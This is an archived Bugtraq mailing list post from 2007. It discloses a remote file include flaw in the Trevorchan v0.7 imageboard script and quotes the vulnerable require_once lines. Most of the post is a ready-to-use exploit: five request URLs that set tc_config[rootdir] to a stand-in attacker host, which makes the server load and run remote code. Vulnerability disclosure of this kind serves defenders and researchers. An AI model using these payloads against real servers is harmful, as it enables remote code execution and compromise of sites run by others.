Bugtraq mailing list archives

Trevorchan <= v0.7 Remote File Include Vulnerability

From: ilkerkandemir () mynet com
Date: 13 Jan 2007 11:33:28 -0000

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...



Script:Trevorchan v0.7
Download: http://rel.trevorchan.org/Releasev07.zip

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>



Code:
require_once($tc_config['rootdir']."/inc/functions.php");
require_once($tc_config['rootdir']."/inc/encryption.php");

-------------------------------------------------------------------------------------------------------------------

Exploit: 
upgrade.php?tc_config[rootdir]=http://attacker.txt?
paint_save.php?tc_config[rootdir]=http://attacker.txt?     
menu.php?tc_config[rootdir]=http://attacker.txt?
manage.php?tc_config[rootdir]=http://attacker.txt?
banned.php?tc_config[rootdir]=http://attacker.txt?
   
-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

Current thread:

Trevorchan <= v0.7 Remote File Include Vulnerability ilkerkandemir (Jan 13)
- Re: Trevorchan <= v0.7 Remote File Include Vulnerability Stefano Zanero (Jan 16)